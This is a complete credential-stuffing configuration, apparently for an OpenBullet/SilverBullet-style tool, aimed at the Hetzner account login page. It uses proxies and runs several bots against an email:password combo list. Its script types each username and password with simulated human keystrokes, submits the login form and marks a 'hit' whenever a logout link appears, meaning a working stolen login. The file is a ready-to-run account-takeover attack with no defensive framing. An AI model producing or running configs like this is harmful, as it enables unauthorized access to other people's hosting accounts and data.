[SETTINGS]
{
  "Name": "hetzner",
  "SuggestedBots": 5,
  "MaxCPM": 0,
  "LastModified": "2022-01-07T02:56:01.4386058+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "hetzner",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
BROWSERACTION Open 

NAVIGATE "https://accounts.hetzner.com/login" 

FUNCTION Delay "1000" 

ELEMENTACTION XPath "//*[@id=\"_username\"]" 
  SendKeys "<USER>" 

FUNCTION Delay "1000" 

ELEMENTACTION XPath "//*[@id=\"_password\"]" 
  SendKeysHuman "<PASS>" 

FUNCTION Delay "1000" 

ELEMENTACTION XPath "//*[@id=\"submit-login\"]" 
  Click 

BROWSERACTION DOMtoSOURCE "<SOURCE>" 

FUNCTION Delay "1000" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid credentials." 
  KEYCHAIN Success OR 
    KEY "/logout" 
    KEY "logout" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

BROWSERACTION Quit 

